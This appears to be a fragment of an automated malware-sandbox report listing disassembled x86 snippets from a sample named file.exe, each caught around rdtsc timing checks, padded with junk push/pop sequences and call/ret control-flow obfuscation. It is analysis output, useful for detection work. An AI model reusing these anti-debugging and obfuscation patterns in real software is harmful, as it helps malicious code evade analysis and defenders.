Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38C95 second address: C38D40 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dx, bx 0x0000000b push 00000000h 0x0000000d or dx, F662h 0x00000012 push 315E4456h 0x00000017 jmp 00007F626941E965h 0x0000001c xor dword ptr [esp], 315E44D6h 0x00000023 mov dword ptr [ebp+122D26CCh], edx 0x00000029 push 00000003h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F626941E958h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 clc 0x00000046 push 00000000h 0x00000048 mov si, 3521h 0x0000004c push 00000003h 0x0000004e cld 0x0000004f call 00007F626941E959h 0x00000054 je 00007F626941E971h 0x0000005a push edx 0x0000005b jmp 00007F626941E969h 0x00000060 pop edx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jns 00007F626941E96Ah 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38D40 second address: C38D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6268DAF3D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38D5C second address: C38D7D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jnc 00007F626941E95Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38D7D second address: C38DED instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6268DAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F6268DAF3D4h 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 jg 00007F6268DAF3C6h 0x0000001d pop eax 0x0000001e jp 00007F6268DAF3C8h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 popad 0x00000027 pop eax 0x00000028 jp 00007F6268DAF3CCh 0x0000002e sub esi, dword ptr [ebp+122D2AAEh] 0x00000034 lea ebx, dword ptr [ebp+1244073Fh] 0x0000003a jl 00007F6268DAF3D3h 0x00000040 pushad 0x00000041 and ebx, 1AD2BC42h 0x00000047 and di, 1132h 0x0000004c popad 0x0000004d xchg eax, ebx 0x0000004e jno 00007F6268DAF3CAh 0x00000054 push eax 0x00000055 push ebx 0x00000056 jng 00007F6268DAF3CCh 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B8A4 second address: C4B8AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C582FB second address: C58311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58311 second address: C5832C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F626941E964h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5832C second address: C5834A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6268DAF3CEh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F6268DAF3CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5834A second address: C58352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C584C4 second address: C584C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C584C8 second address: C584F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F626941E95Fh 0x0000000c pop edi 0x0000000d jmp 00007F626941E95Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C584F0 second address: C584F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58653 second address: C58670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626941E969h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58670 second address: C5867D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5867D second address: C58683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58683 second address: C58687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58687 second address: C5868B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5895C second address: C58968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6268DAF3C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C58F46 second address: C58F9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F626941E956h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F626941E968h 0x00000014 jmp 00007F626941E962h 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F626941E966h 0x00000020 je 00007F626941E956h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59105 second address: C59109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59109 second address: C5910F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5926B second address: C5926F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5926F second address: C59279 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F626941E956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D1B2 second address: C4D1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59692 second address: C596A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E95Fh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C596A6 second address: C596DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jc 00007F6268DAF3C6h 0x00000012 jmp 00007F6268DAF3D0h 0x00000017 jno 00007F6268DAF3C6h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 jno 00007F6268DAF3CEh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59E4D second address: C59E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59E53 second address: C59E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F6268DAF3C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59E5F second address: C59E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C59FA8 second address: C59FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6268DAF3C6h 0x0000000a jns 00007F6268DAF3C6h 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop esi 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007F6268DAF3CBh 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 jmp 00007F6268DAF3D4h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A137 second address: C5A148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F626941E956h 0x00000009 jne 00007F626941E956h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A148 second address: C5A153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A153 second address: C5A161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626941E95Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A161 second address: C5A189 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6268DAF3C6h 0x00000008 jo 00007F6268DAF3C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop edi 0x00000018 jnl 00007F6268DAF3D0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A189 second address: C5A18F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A18F second address: C5A193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A4A9 second address: C5A4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A4AD second address: C5A4DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3CEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6268DAF3D7h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5A4DD second address: C5A4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jns 00007F626941E956h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2916B second address: C29181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F6268DAF3CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F1EA second address: C5F1EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F1EE second address: C5F1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F942 second address: C5F956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E960h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5F956 second address: C5F95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FA8F second address: C5FA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5FA93 second address: C5FA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C663D4 second address: C663D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C663D9 second address: C663DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C66BAD second address: C66BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C66BB3 second address: C66BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C66BBF second address: C66BE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E961h 0x00000007 jmp 00007F626941E95Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69355 second address: C6935E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C694CE second address: C694D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C694D3 second address: C694D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69820 second address: C69825 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C698E7 second address: C698EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C698EB second address: C698F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C698F1 second address: C69903 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F6268DAF3C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69903 second address: C69907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C69DBB second address: C69DF0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6268DAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F6268DAF3C8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 adc esi, 23BAF3A8h 0x0000002d push eax 0x0000002e pushad 0x0000002f push ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6A1AF second address: C6A1C9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F626941E95Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6A2B9 second address: C6A2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6A36A second address: C6A397 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F626941E958h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D23BDh] 0x00000013 push eax 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F626941E95Ah 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007F626941E956h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6A958 second address: C6A9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F6268DAF3C8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F6268DAF3C8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d or dword ptr [ebp+122D1C43h], ecx 0x00000043 jne 00007F6268DAF3CEh 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push edx 0x0000004e call 00007F6268DAF3C8h 0x00000053 pop edx 0x00000054 mov dword ptr [esp+04h], edx 0x00000058 add dword ptr [esp+04h], 00000017h 0x00000060 inc edx 0x00000061 push edx 0x00000062 ret 0x00000063 pop edx 0x00000064 ret 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 jc 00007F6268DAF3C8h 0x0000006e push esi 0x0000006f pop esi 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B3B0 second address: C6B3E5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F626941E956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov si, di 0x0000000f push 00000000h 0x00000011 call 00007F626941E963h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop esi 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D2B8Ch], edi 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B3E5 second address: C6B3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6268DAF3C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B1C6 second address: C6B1E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E964h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F626941E956h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6DEC8 second address: C6DEE4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6268DAF3C6h 0x00000008 jmp 00007F6268DAF3D2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6DEE4 second address: C6DF1B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F626941E95Eh 0x00000008 jmp 00007F626941E966h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F626941E95Bh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6E529 second address: C6E53D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6E53D second address: C6E5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F626941E956h 0x00000009 je 00007F626941E956h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F626941E958h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007F626941E958h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 push ecx 0x0000004a mov edi, 18C46721h 0x0000004f pop edi 0x00000050 or edi, 4252B31Ah 0x00000056 push 00000000h 0x00000058 cmc 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F626941E964h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6E5BF second address: C6E5D6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6268DAF3CCh 0x00000008 ja 00007F6268DAF3C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6FBB5 second address: C6FBBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6FBBB second address: C6FBC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6FBC6 second address: C6FC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 nop 0x00000007 cld 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F626941E958h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jp 00007F626941E96Fh 0x0000002a jmp 00007F626941E969h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F626941E958h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b mov di, A71Ah 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F626941E963h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6FC53 second address: C6FC5D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6268DAF3C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6FC5D second address: C6FC68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F626941E956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7924B second address: C792B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jmp 00007F6268DAF3D7h 0x0000000c push 00000000h 0x0000000e xor di, AB00h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F6268DAF3C8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jng 00007F6268DAF3C9h 0x00000035 movsx ebx, dx 0x00000038 adc di, 7844h 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f pushad 0x00000040 jnp 00007F6268DAF3C6h 0x00000046 push edx 0x00000047 pop edx 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C743DE second address: C743E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
